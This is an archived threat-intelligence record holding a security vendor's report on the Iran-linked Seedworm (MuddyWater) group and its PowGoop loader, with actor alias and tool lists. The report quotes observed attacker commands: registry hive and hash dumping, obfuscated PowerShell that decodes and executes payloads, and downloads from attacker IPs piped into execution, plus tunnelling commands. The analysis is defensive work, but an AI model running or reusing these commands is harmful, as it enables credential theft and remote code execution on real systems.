{ "id": "895ce6d4-9cb6-4046-b98d-2e180dd65bf5", "created_at": "2026-04-06T00:18:54.731787Z", "updated_at": "2026-04-10T03:34:22.896547Z", "deleted_at": null, "sha1_hash": "acd59b18a0dc3ef92c23178da16b314b08c0eb04", "title": "Seedworm: Iran-Linked Group Continues to Target Organizations in the Middle East", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 54740, "plain_text": "Seedworm: Iran-Linked Group Continues to Target Organizations in the\r\nMiddle East\r\nBy About the Author\r\nArchived: 2026-04-05 17:52:01 UTC\r\nThe Iran-linked espionage group Seedworm (aka MuddyWater) has been highly active in recent months, attacking a wide\r\nrange of targets, including a large number of government organizations in the Middle East.\r\nMany of the organizations attacked by Seedworm in recent months have also been targeted by a recently discovered tool\r\ncalled PowGoop (Downloader.Covic), suggesting that it is a tool that Seedworm has incorporated into its arsenal. However,\r\nat present Symantec, a division of Broadcom (NASDAQ: AVGO), can only make a medium-confidence link between\r\nSeedworm and PowGoop.\r\nThe recent wave of Seedworm attacks were uncovered by Symantec’s Targeted Attack Cloud Analytics, which leverages\r\nadvanced machine learning to spot patterns of activity associated with targeted attacks. The activity was reviewed by\r\nSymantec’s Threat Hunter team (part of Symantec’s Endpoint Security Complete offering) which linked it to previous\r\nSeedworm activity.\r\nAmong the things flagged by Cloud Analytics was a registry key called “SecurityHealthCore\". The code residing in this\r\nregistry key is executed by PowerShell from a scheduled task. In all of the organizations where this registry key was found,\r\na known Seedworm backdoor (Backdoor.Mori) was subsequently detected.\r\nAttacks were uncovered against targets in Iraq, Turkey, Kuwait, the United Arab Emirates, and Georgia. In addition to some\r\ngovernment entities, organizations in the telecoms and computer services sector were also targeted.\r\nIn one such victim, a sample of Backdoor.Mori was dropped and installed as early as December 2019 on a SQL server.\r\nSeedworm activity continued until at least July 2020, with the installation of additional hacking tools by the attackers.\r\nDuring this time, Symantec observed Seedworm performing credential-stealing activities as well as setting up tunnels to its\r\nown infrastructure to assist with lateral movement using an open-source tools known as Secure Sockets Funneling (SSF) and\r\nChisel. Seedworm is known to have leveraged Chisel in the past.\r\nCredential stealing\r\nCredential dumping was done by dumping the contents of the Windows Registry to files in the same directories as\r\nSeedworm backdoors. Additionally, Seedworm was also observed using Quarks password dumper (Quarks PwDump) to\r\nsteal local account password hashes.\r\nreg save hklm\\system CSIDL_PROFILE\\public\\system.c\r\nreg save hklm\\sam CSIDL_PROFILE\\public\\sam.c\r\nCSIDL_COMMON_APPDATA\\dump.exe --dump-hash-local (sha2:\r\nf9c4f95592d0e543bca52f5882eace65fe3bbbb99bcaae6e97000115fb3cb781)\r\nTunneling back to the attackers’ infrastructure\r\nSeedworm was also observed setting up tunnels to its own infrastructure using Secure Sockets Funneling and Chisel. These\r\ntools allow the attackers to configure local and remote port forwarding as well as copying files to compromised machines.\r\nThe PowGoop connection\r\nOn the same machine where Seedworm was active, a tool known as PowGoop was deployed. This same tool was also\r\ndeployed against several of the organizations attacked by Seedworm in recent months; however, at present Symantec can\r\nonly establish a medium-confidence link between PowGoop and Seedworm.\r\nPowGoop, which was first publicly reported on in July 2020, is a loader DLL. It likely arrives in a ZIP file named\r\n‘google.zip’ containing the loader itself and legitimate Google binaries used for side-loading it.\r\nIn the same organization as mentioned previously, Symantec observed Seedworm activity which was followed by PowGoop\r\nactivity just six days later.\r\nIn the majority of recent infections, PowGoop appears to have been deployed via a remote execution tool known as\r\nRemadmin. This tool is used to execute PowerShell to read and decode the contents of a file which is used to execute the\r\ncontents in memory. It appears this code is used to load PowGoop’s main DLL (goopdate.dll) via rundll32.exe.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east\r\nPage 1 of 3\n\npowershell -exec bypass \"$a=gc C:\\WINDOWS\\TEMP\\ManyaBetta;del C:\\WINDOWS\\TEMP\\ManyaBetta;function\r\nGabrielle($OliviaTomi){$Emlyn = [System.Convert]::FromBase64String($OliviaTomi);return\r\n[System.Text.Encoding]::UTF8.GetString($Emlyn);}function Tina($Daisi){$OliviaTomi =\r\n[System.Text.Encoding]::UTF8.GetBytes($Daisi);for ($TheresitaNitaChad=0; $TheresitaNitaChad -le\r\n$OliviaTomi.count -1; $TheresitaNitaChad++){$OliviaTomi[$TheresitaNitaChad] =\r\n$OliviaTomi[$TheresitaNitaChad] - 2;}return [System.Text.Encoding]::UTF8.GetString($OliviaTomi);}function\r\nGlyndaMaureen($OliviaTomi){$Rosalinde = Gabrielle $OliviaTomi;$LeonaJolene = Tina $Rosalinde;return\r\n$LeonaJolene;};$t =GlyndaMaureen($a);\u0026($ShellId[1] + 'ex') $t;\"\r\nA feature of these files is that they have distinctive variable and function naming that resembles human names concatenated\r\ntogether. We have no reason to believe that these are actual people’s names.\r\nOn several of the victim machines, a ZIP file called ‘google.zip’ was also found present in the same directory. How the ZIP\r\nfile arrives on the victim’s computer remains unknown. The ZIP contains a mix of legitimate Google executables and\r\nmalicious DLL files. A legitimate ‘googleupdate.exe’ file is used to side load PowGoop via rundll32.exe. PowGoop loaders\r\nare used to decode and execute the contents of a file called ‘config.txt’. All config.txt files found to date\r\ncontained PowerShell scripts that download and execute more PowerShell code.\r\npowershell -exec bypass \"function bdec($in){$out = [System.Convert]::FromBase64String($in);return\r\n[System.Text.Encoding]::UTF8.GetString($out);}function bDec2($szinput){$in =\r\n[System.Text.Encoding]::UTF8.GetBytes($szinput);for ($i=0; $i -le $in.count -1; $i++){$in[$i] = $in[$i] - 2;}return\r\n[System.Text.Encoding]::UTF8.GetString($in);}function bDd($in){$dec = bdec $in;$temp = bDec2 $dec;return\r\n$temp;}$a=get-content \" config.txt\";$t =bDd $a;\u0026($ShellId[1] + 'ex') $t;\"\r\nRundll32.exe CSIDL_COMMON_APPDATA\\andreavania\\goopdate.dll,dllregisterserver\r\nIn some cases, PowGoop is used to launch ‘Wscript.exe’ to execute an unknown VBS file called ‘v.txt’.\r\n\"CSIDL_SYSTEM\\wscript.exe\" /e:vbs CSIDL_PROFILE\\[REDACTED]\\documents\\v.txt\r\nSimilarly, Symantec also observed legitimate tools (openssl.exe) and a downloader tool (ssleay32.dll) present in the same\r\ndirectories used to download additional tools:\r\nCSIDL_SYSTEM\\rundll32.exe CSIDL_COMMON_APPDATA\\georgettaemilee\\ssleay32.dll\r\n,DllRegisterServer http://107.173.141.103:443/downloadc.php?key=[REDACTED]\r\nCSIDL_SYSTEM\\rundll32.exe CSIDL_COMMON_APPDATA\\samariaantonina\\ssleay32.dll ,DllRegisterServer\r\nhttp://107.173.141.114:443/downloadc.php?key=[REDACTED]\r\nSimilar download requests were also observed via PowerShell:\r\npowershell -exec bypass $V=new-object net.webclient;$V.proxy=\r\n[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$AaA =\r\n\"Do\";$AaB = \" wnloadStr\";$AaC = \"ing\";$s=\"$AaA$AaB$AaC\"('http://23.95.220.166:80/download.php?\r\nk=564');$s;\"\r\n$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=\r\n[Net.CredentialCache]::DefaultCredentials;start-sleep\r\n10;$s=$V.DownloadString('http://104.168.44.16:443/H6qy8yvXhV69mF8CgpmWwKb1oV19xMqaI');iex($s)\r\nDuring PowGoop activity, Symantec also observed the attackers using the Secure Sockets Funneling tool as well as Chisel\r\nsuggesting a link between the two sets of activity.\r\n\"CSIDL_PROFILE\\[REDACTED]\\documents\\ussf.exe\" -c CSIDL_PROFILE\\[REDACTED]\\documents\\config.txt -\r\nF 9900 -p [REDACTED] 107.172.97.172\r\nCSIDL_COMMON_APPDATA\\sharp.cmd client 107.175.0.140:443 R:8888:127.0.0.1:9999\r\nCSIDL_COMMON_APPDATA\\sharp.cmd server -p [REDACTED] --socks5\r\nAdditional links between Seedworm and PowGoop\r\nIn several recent Seedworm attacks, PowGoop was used on computers that were also infected with known Seedworm\r\nmalware (Backdoor.Mori). In addition to this, activity involving Seedworm’s Powerstats (aka Powermud) backdoor appears\r\nto have been superseded by DLL side-loading of PowGoop.\r\nAdditionally, during PowGoop activity, we also observed the attackers downloading tools and some unknown content from\r\nGitHub repos, similar to what has been reported on Seedworm‘s Powerstats in the past.\r\npowershell -exec bypass $e=new-object net.webclient;$e.proxy=\r\n[Net.WebRequest]::GetSystemWebProxy();$e.Proxy.Credentials=\r\n[Net.CredentialCache]::DefaultCredentials;$aa=$e.DownloadString('https://gist.githubusercontent.com/ffcommax/24587757d3328672954e4155a4\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east\r\nPage 2 of 3\n\nThese patterns of activity beg the question as to whether PowGoop is actually an evolution of Powerstats rather than a\r\ncompletely new tool. To date, there is insufficient evidence to confirm this hypothesis. However, there are several\r\nsimilarities between the tools:\r\nUse of hard-coded GUID tokens and proxy URLs for command and control (C\u0026C) communications\r\nFetching and executing commands from C\u0026C servers using PowerShell\r\nSome low-confidence similarities in code structure and encoding techniques\r\nWhile none of this is sufficient to confirm that PowGoop has evolved from Powerstats, Symantec continues to monitor the\r\nactivity of Seedworm for any additional evidence.\r\nThanos ransomware link\r\nPowGoop has, in recent weeks, been loosely linked to a variant of ransomware known as Thanos. Thanos is an aggressive\r\nform of ransomware which, in addition to encryption, will also attempt to overwrite the master boot record (MBR) of the\r\ninfected computer.\r\nOur peers at Palo Alto Networks reported that PowGoop was found at a Middle Eastern state-run organization which was\r\nalso hit by Thanos. This lead to the suspicion that the Thanos attackers were using PowGoop in their attacks; however, Palo\r\nAlto could not confirm the connection.\r\nSymantec has not found any evidence of a wiper or ransomware on computers infected with PowGoop. This suggests that\r\neither the simultaneous presence of PowGoop and Thanos in one attack was a coincidence or, if the two are linked, that\r\nPowGoop is not used exclusively to deliver Thanos.\r\nSymantec uncovered attacks involving PowGoop against organizations in Iraq, Afghanistan, Israel, Turkey, Azerbaijan,\r\nGeorgia, Cambodia, and Vietnam. Sectors targeted included governments, technology, telecoms, oil and gas, real estate, and\r\neducation.\r\nVigilance required\r\nSeedworm has been one of the most active Iran-linked groups in recent months, mounting apparent intelligence-gathering\r\noperations across the Middle East. While the connection between PowGoop and Seedworm remains tentative, it may suggest\r\nsome retooling on Seedworm’s part. Any organizations who do find evidence of PowGoop on their networks should exercise\r\nextreme caution and perform a thorough investigation.\r\nProtection\r\nThe following protections are in place to protect customers against Seedworm attacks:\r\nFile-based protection\r\nBackdoor.Mori\r\nBackdoor.Powemuddy\r\nDownloader.Covic\r\nNetwork-based protection\r\nSystem Infected: Trojan.Backdoor Activity 243\r\nIndicators of Compromise\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east\r\nPage 3 of 3", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east" ], "report_names": [ "seedworm-apt-iran-middle-east" ], "threat_actors": [ { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434734, "ts_updated_at": 1775792062, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/acd59b18a0dc3ef92c23178da16b314b08c0eb04.pdf", "text": "https://archive.orkl.eu/acd59b18a0dc3ef92c23178da16b314b08c0eb04.txt", "img": "https://archive.orkl.eu/acd59b18a0dc3ef92c23178da16b314b08c0eb04.jpg" } }